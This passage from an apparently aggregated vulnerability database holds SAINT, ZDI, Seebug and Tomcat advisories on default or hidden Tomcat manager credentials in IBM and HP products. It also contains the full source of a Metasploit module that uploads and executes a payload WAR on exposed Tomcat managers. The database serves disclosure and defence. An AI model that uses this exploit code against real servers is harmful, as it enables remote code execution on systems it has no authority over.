Resolution\n\nDownload the fix for IBM Rational Quality Manager 2.0.1 from [IBM](<http://download4.boulder.ibm.com/sar/CMA/RAA/013m6/0/Rules-Update-749.exe>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-214/> \n\n\n### Limitations\n\nExploit works on IBM Rational Quality Manager 2.0.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "IBM Rational Quality Manager and Test Lab Manager Policy Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4094"], "modified": "2010-11-05T00:00:00", "id": "SAINT:C49FD1E788C94DE32BF7E4D34FB252F9", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ibm_rational_quality_manager_default_credentials", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2016-10-03T15:02:01", "description": "Added: 05/25/2010 \nCVE: [CVE-2010-0557](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0557>) \nBID: [38084](<http://www.securityfocus.com/bid/38084>) \nOSVDB: [62118](<http://www.osvdb.org/62118>) \n\n\n### Background\n\n[IBM Cognos Express](<http://www-01.ibm.com/software/data/cognos/products/cognos-express/>) is an integrated business intelligence (BI) and planning solution which delivers the essential reporting, analysis, dashboard, scorecard, planning, budgeting and forecasting capabilities that midsize companies need. \n\n### Problem\n\nThe vulnerability is due to hard-coded user credentials, with manager-level permissions, installed by default in the user configuration of the bundled Tomcat Manager server. Remote unauthenticated attackers can exploit this vulnerability by using these credentials to connect to the vulnerable server on port 19300/TCP and deploy a malicious web application on a vulnerable system. Injected code will run with the privileges of the Tomcat server process. On Windows systems, the Tomcat server runs as SYSTEM. \n\n### Resolution\n\nFollow the directions in the IBM Advisory [SWG21419179](<http://www-01.ibm.com/support/docview.wss?uid=swg21419179>). \n\n### References\n\n<http://secunia.com/advisories/38457/> \n\n\n### Limitations\n\nExploit works on IBM Cognos Express 9.0. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-05-25T00:00:00", "type": "saint", "title": "IBM Cognos Express Server Backdoor Account Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0557"], "modified": "2010-05-25T00:00:00", "id": "SAINT:432CEB57E28BB8F1CCBA5539DAF61BF3", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ibm_cognos_express_backdoor_account", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-07-29T16:40:32", "description": "Added: 05/25/2010 \nCVE: [CVE-2010-0557](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0557>) \nBID: [38084](<http://www.securityfocus.com/bid/38084>) \nOSVDB: [62118](<http://www.osvdb.org/62118>) \n\n\n### Background\n\n[IBM Cognos Express](<http://www-01.ibm.com/software/data/cognos/products/cognos-express/>) is an integrated business intelligence (BI) and planning solution which delivers the essential reporting, analysis, dashboard, scorecard, planning, budgeting and forecasting capabilities that midsize companies need. \n\n### Problem\n\nThe vulnerability is due to hard-coded user credentials, with manager-level permissions, installed by default in the user configuration of the bundled Tomcat Manager server. Remote unauthenticated attackers can exploit this vulnerability by using these credentials to connect to the vulnerable server on port 19300/TCP and deploy a malicious web application on a vulnerable system. Injected code will run with the privileges of the Tomcat server process. On Windows systems, the Tomcat server runs as SYSTEM. \n\n### Resolution\n\nFollow the directions in the IBM Advisory [SWG21419179](<http://www-01.ibm.com/support/docview.wss?uid=swg21419179>). \n\n### References\n\n<http://secunia.com/advisories/38457/> \n\n\n### Limitations\n\nExploit works on IBM Cognos Express 9.0. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-05-25T00:00:00", "type": "saint", "title": "IBM Cognos Express Server Backdoor Account Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0557"], "modified": "2010-05-25T00:00:00", "id": "SAINT:F3AA05B5F208FC7C290557EB7CA70DBF", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ibm_cognos_express_backdoor_account", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:35:19", "description": "Added: 05/25/2010 \nCVE: [CVE-2010-0557](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0557>) \nBID: [38084](<http://www.securityfocus.com/bid/38084>) \nOSVDB: [62118](<http://www.osvdb.org/62118>) \n\n\n### Background\n\n[IBM Cognos Express](<http://www-01.ibm.com/software/data/cognos/products/cognos-express/>) is an integrated business intelligence (BI) and planning solution which delivers the essential reporting, analysis, dashboard, scorecard, planning, budgeting and forecasting capabilities that midsize companies need. \n\n### Problem\n\nThe vulnerability is due to hard-coded user credentials, with manager-level permissions, installed by default in the user configuration of the bundled Tomcat Manager server. Remote unauthenticated attackers can exploit this vulnerability by using these credentials to connect to the vulnerable server on port 19300/TCP and deploy a malicious web application on a vulnerable system. Injected code will run with the privileges of the Tomcat server process. On Windows systems, the Tomcat server runs as SYSTEM. \n\n### Resolution\n\nFollow the directions in the IBM Advisory [SWG21419179](<http://www-01.ibm.com/support/docview.wss?uid=swg21419179>). \n\n### References\n\n<http://secunia.com/advisories/38457/> \n\n\n### Limitations\n\nExploit works on IBM Cognos Express 9.0. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-05-25T00:00:00", "type": "saint", "title": "IBM Cognos Express Server Backdoor Account Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0557"], "modified": "2010-05-25T00:00:00", "id": "SAINT:4323BB9E55DCFF792582CDFE8B06FEAC", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ibm_cognos_express_backdoor_account", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 05/25/2010 \nCVE: [CVE-2010-0557](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0557>) \nBID: [38084](<http://www.securityfocus.com/bid/38084>) \nOSVDB: [62118](<http://www.osvdb.org/62118>) \n\n\n### Background\n\n[IBM Cognos Express](<http://www-01.ibm.com/software/data/cognos/products/cognos-express/>) is an integrated business intelligence (BI) and planning solution which delivers the essential reporting, analysis, dashboard, scorecard, planning, budgeting and forecasting capabilities that midsize companies need. \n\n### Problem\n\nThe vulnerability is due to hard-coded user credentials, with manager-level permissions, installed by default in the user configuration of the bundled Tomcat Manager server. Remote unauthenticated attackers can exploit this vulnerability by using these credentials to connect to the vulnerable server on port 19300/TCP and deploy a malicious web application on a vulnerable system. Injected code will run with the privileges of the Tomcat server process. On Windows systems, the Tomcat server runs as SYSTEM. \n\n### Resolution\n\nFollow the directions in the IBM Advisory [SWG21419179](<http://www-01.ibm.com/support/docview.wss?uid=swg21419179>). \n\n### References\n\n<http://secunia.com/advisories/38457/> \n\n\n### Limitations\n\nExploit works on IBM Cognos Express 9.0. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-05-25T00:00:00", "type": "saint", "title": "IBM Cognos Express Server Backdoor Account Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0557"], "modified": "2010-05-25T00:00:00", "id": "SAINT:B0A1D9F854F22F1DE9F592C0BF728365", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ibm_cognos_express_backdoor_account", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-29T16:40:15", "description": "Added: 11/05/2010 \nCVE: [CVE-2009-3548](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548>) \nBID: [36954](<http://www.securityfocus.com/bid/36954>) \nOSVDB: [60176](<http://www.osvdb.org/60176>) \n\n\n### Background\n\nHP Performance Manager Software is a web-based analysis and visualization tool that analyzes performance trends of applications, systems, and services. HP Performance Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in HP Performance Manager. HP Performance Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### Resolution\n\nApply the fix referenced in [HP Security Bulletin HPSBMA02535](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02181353>). \n\n### References\n\n<http://secunia.com/advisories/39847/> \n\n\n### Limitations\n\nExploit works on HP Performance Manager 8.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "HP Performance Manager Apache Tomcat Policy Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548"], "modified": "2010-11-05T00:00:00", "id": "SAINT:FA41BCBF61DEF78FB3035ECD0A423296", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_performance_mngr_tomcat_default_password", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:35:10", "description": "Added: 11/05/2010 \nCVE: [CVE-2009-3548](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548>) \nBID: [36954](<http://www.securityfocus.com/bid/36954>) \nOSVDB: [60176](<http://www.osvdb.org/60176>) \n\n\n### Background\n\nHP Performance Manager Software is a web-based analysis and visualization tool that analyzes performance trends of applications, systems, and services. HP Performance Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in HP Performance Manager. HP Performance Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### Resolution\n\nApply the fix referenced in [HP Security Bulletin HPSBMA02535](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02181353>). \n\n### References\n\n<http://secunia.com/advisories/39847/> \n\n\n### Limitations\n\nExploit works on HP Performance Manager 8.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "HP Performance Manager Apache Tomcat Policy Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548"], "modified": "2010-11-05T00:00:00", "id": "SAINT:1E5F50E71375DAEB9F5F859C572CF522", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/hp_performance_mngr_tomcat_default_password", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:37", "description": "Added: 11/05/2010 \nCVE: [CVE-2009-3548](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548>) \nBID: [36954](<http://www.securityfocus.com/bid/36954>) \nOSVDB: [60176](<http://www.osvdb.org/60176>) \n\n\n### Background\n\nHP Performance Manager Software is a web-based analysis and visualization tool that analyzes performance trends of applications, systems, and services. HP Performance Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in HP Performance Manager. HP Performance Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### Resolution\n\nApply the fix referenced in [HP Security Bulletin HPSBMA02535](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02181353>). \n\n### References\n\n<http://secunia.com/advisories/39847/> \n\n\n### Limitations\n\nExploit works on HP Performance Manager 8.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "HP Performance Manager Apache Tomcat Policy Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548"], "modified": "2010-11-05T00:00:00", "id": "SAINT:EBB5064D9257E93A49BF25A71D24E1AA", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_performance_mngr_tomcat_default_password", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:59", "description": "Added: 11/05/2010 \nCVE: [CVE-2009-3548](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548>) \nBID: [36954](<http://www.securityfocus.com/bid/36954>) \nOSVDB: [60176](<http://www.osvdb.org/60176>) \n\n\n### Background\n\nHP Performance Manager Software is a web-based analysis and visualization tool that analyzes performance trends of applications, systems, and services. HP Performance Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in HP Performance Manager. HP Performance Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### Resolution\n\nApply the fix referenced in [HP Security Bulletin HPSBMA02535](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02181353>). \n\n### References\n\n<http://secunia.com/advisories/39847/> \n\n\n### Limitations\n\nExploit works on HP Performance Manager 8.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "HP Performance Manager Apache Tomcat Policy Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3548"], "modified": "2010-11-05T00:00:00", "id": "SAINT:9E88983E6D2E3F9BD58C6DCB531A7E97", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_performance_mngr_tomcat_default_password", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdi": [{"lastseen": "2022-01-31T22:40:53", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Operations Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists due to a hidden account present within the Tomcat users XML file. Using this account a malicious user can access the org.apache.catalina.manager.HTMLManagerServlet class. This is defined within the catalina-manager.jar file installed with the product. This servlet allows a remote user to upload a file via a POST request to /manager/html/upload. If an attacker uploads malicious content it can then be accessed and executed on the server which leads to arbitrary code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2009-11-20T00:00:00", "type": "zdi", "title": "Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-20T00:00:00", "id": "ZDI-09-085", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-085/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:34", "description": "", "cvss3": {}, "published": "2010-02-19T00:00:00", "type": "packetstorm", "title": "Apache Tomcat Manager Application Deployer Upload and Execute", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2010-02-19T00:00:00", "id": "PACKETSTORM:86448", "href": "https://packetstormsecurity.com/files/86448/Apache-Tomcat-Manager-Application-Deployer-Upload-and-Execute.html", "sourceData": "`## \n# $Id: tomcat_mgr_deploy.rb 8552 2010-02-18 18:18:43Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Tomcat Manager Application Deployer Upload and Execute', \n'Description' => %q{ \nThis module can be used to execute a payload on Apache Tomcat servers that \nhave an exposed \"manager\" application. The payload is uploaded as a WAR archive \ncontaining a jsp application using a PUT request. \n \nThe manager application can also be abused using /manager/html/upload, but that \nmethod is not implemented in this module. \n}, \n'Author' => [ 'jduck' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 8552 $', \n'References' => \n[ \n# There is no single vulnerability associated with deployment functionality. \n# Instead, the focus has been on insecure/blank/hardcoded default passwords. \n \n# The following references refer to HP Operations Manager \n[ 'CVE', '2009-3843' ], \n[ 'OSVDB', '60317' ], \n \n# tomcat docs \n[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] \n], \n'Platform' => [ 'win' ], \n'Targets' => \n[ \n[ 'Automatic', { } ], \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('PATH', [ true, \"The URI path of the manager app (/deploy and /undeploy will be used)\", '/manager']) \n], self.class) \nend \n \n \ndef exploit \n \n# TODO: autodetect arch/platform from /manager/serverinfo and/or db notes \narch = ARCH_X86 \nplat = [Msf::Module::Platform::Windows] \n \n# Generate the WAR containing the EXE containing the payload \njsp_name = rand_text_alphanumeric(4+rand(32-4)) \nwar = Msf::Util::EXE.to_jsp_war(framework, \narch, plat, \npayload.encoded, \n:jsp_name => jsp_name) \n \napp_base = rand_text_alphanumeric(4+rand(32-4)) \napp_name = app_base + \".war\" \nquery_str = \"?path=/\" + app_base \n \n# \n# UPLOAD \n# \npath_tmp = datastore['PATH'] + \"/deploy\" + query_str \nprint_status(\"Uploading #{war.length} bytes as #{app_name}...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'PUT', \n'ctype' => 'application/octet-stream', \n'data' => war, \n}, 20) \nif (! res) \nraise RuntimeError, \"Upload failed on #{path_tmp} [No Response]\" \nend \nif (res.code < 200 or res.code >= 300) \ncase res.code \nwhen 401 \nprint_error(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") \nend \nraise RuntimeError, \"Upload failed on #{path_tmp} [#{res.code} #{res.message}]\" \nend \n \n \n# \n# EXECUTE \n# \nprint_status(\"Executing #{app_base}...\") \nres = send_request_cgi({ \n'uri' => '/' + app_base + '/' + jsp_name + '.jsp', \n'method' => 'GET' \n}, 20) \n \nif (! res) \nprint_error(\"Execution failed on #{app_base} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Execution failed on #{app_base} [#{res.code} #{res.message}]\") \nend \n \n \n# \n# DELETE \n# \npath_tmp = datastore['PATH'] + \"/undeploy\" + query_str \nprint_status(\"Undeploying #{app_base} ...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'GET' \n}, 20) \nif (! res) \nprint_error(\"WARNING: Undeployment failed on #{path} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Deletion failed on #{path} [#{res.code} #{res.message}]\") \nend \n \nhandler \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/86448/tomcat_mgr_deploy.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:44:46", "description": "BUGTRAQ ID: 37086\r\nCVE ID: CVE-2009-3843\r\n\r\nHP Operations Manager\u662f\u7528\u4e8e\u534f\u8c03IT\u57fa\u7840\u67b6\u6784\u4e2d\u7f51\u7edc\u3001\u6700\u7ec8\u7528\u6237\u4f53\u9a8c\u4e8b\u4ef6\u7684\u7efc\u5408\u4e8b\u4ef6\u548c\u6027\u80fd\u7ba1\u7406\u63a7\u5236\u53f0\u3002\r\n\r\nHP Operations Manager\u7684Tomcat\u7528\u6237XML\u6587\u4ef6\u4e2d\u5b58\u5728\u9690\u85cf\u7684\u8d26\u53f7\uff0c\u6076\u610f\u7528\u6237\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u8d26\u53f7\u8bbf\u95eeorg.apache.catalina.manager.HTMLManagerServlet\u7c7b\uff0c\u800c\u8fd9\u4e2aservlet\u5141\u8bb8\u8fdc\u7a0b\u7528\u6237\u901a\u8fc7POST\u8bf7\u6c42\u5411/manager/html/upload\u4e0a\u4f20\u6587\u4ef6\u3002\u5982\u679c\u653b\u51fb\u8005\u4e0a\u4f20\u4e86\u6076\u610f\u5185\u5bb9\uff0c\u4e4b\u540e\u5c31\u53ef\u4ee5\u5728\u670d\u52a1\u5668\u4e0a\u8bbf\u95ee\u5e76\u4ee5SYSTEM\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nHP Operations Manager 8.10\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nHP\r\n--\r\nHP\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08HPSBMA02478\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nHPSBMA02478\uff1aSSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\n\u94fe\u63a5\uff1ahttp://alerts.hp.com/r?2.1.3KT.2ZR.zWmfi.DtgsGC..T.Lt1%5f.2ODk.bW89MQ%5f%5fDNLKFTH0\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\nhttp://support.openview.hp.com/selfsolve/patches", "cvss3": {}, "published": "2009-11-24T00:00:00", "type": "seebug", "title": "HP Operations Manager 8.10 \u540e\u95e8\u8d26\u53f7\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14974", "id": "SSV:14974", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:31:01", "description": "BUGTRAQ ID: 36954\r\nCVE ID: CVE-2009-3548\r\n\r\nApache Tomcat\u662f\u4e00\u4e2a\u6d41\u884c\u7684\u5f00\u653e\u6e90\u7801\u7684JSP\u5e94\u7528\u670d\u52a1\u5668\u7a0b\u5e8f\u3002\r\n\r\nWindows\u5b89\u88c5\u7a0b\u5e8f\u9ed8\u8ba4\u5bf9\u7ba1\u7406\u7528\u6237\u8bbe\u7f6e\u4e86\u7a7a\u53e3\u4ee4\u3002\u5982\u679c\u5728\u5b89\u88c5\u8fc7\u7a0b\u4e2d\u6ca1\u6709\u66f4\u6539\u8fd9\u4e2a\u53e3\u4ee4\uff0c\u5c31\u4f1a\u4f7f\u7528\u7a7a\u53e3\u4ee4\u521b\u5efa\u5404\u79cd\u7ba1\u7406\u7528\u6237\u3002\n\nTomcat 5.5.0 to 5.5.28\r\nTomcat 6.0.0 to 6.0.20\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://svn.apache.org/viewvc?view=revision&amp;revision=834047", "cvss3": {}, "published": "2009-11-10T00:00:00", "type": "seebug", "title": "Apache Tomcat Windows\u5b89\u88c5\u7a0b\u5e8f\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3548"], "modified": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12601", "id": "SSV:12601", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "tomcat": [{"lastseen": "2021-12-30T15:23:05", "description": "**Low: Arbitrary file deletion and/or alteration on deploy** [CVE-2009-2693](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693>)\n\nWhen deploying WAR files, the WAR files were not checked for directory traversal attempts. This allows an attacker to create arbitrary content outside of the web root by including entries such as `../../bin/catalina.sh` in the WAR.\n\nThis was fixed in [revision 902650](<https://svn.apache.org/viewvc?view=rev&rev=902650>).\n\nThis was first reported to the Tomcat security team on 30 Jul 2009 and made public on 1 Mar 2010.\n\nAffects: 5.5.0-5.5.28\n\n**Low: Insecure partial deploy after failed undeploy** [CVE-2009-2901](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901>)\n\nBy default, Tomcat automatically deploys any directories placed in a host's appBase. This behaviour is controlled by the autoDeploy attribute of a host which defaults to true. After a failed undeploy, the remaining files will be deployed as a result of the autodeployment process. Depending on circumstances, files normally protected by one or more security constraints may be deployed without those security constraints, making them accessible without authentication. This issue only affects Windows platforms\n\nThis was fixed in [revision 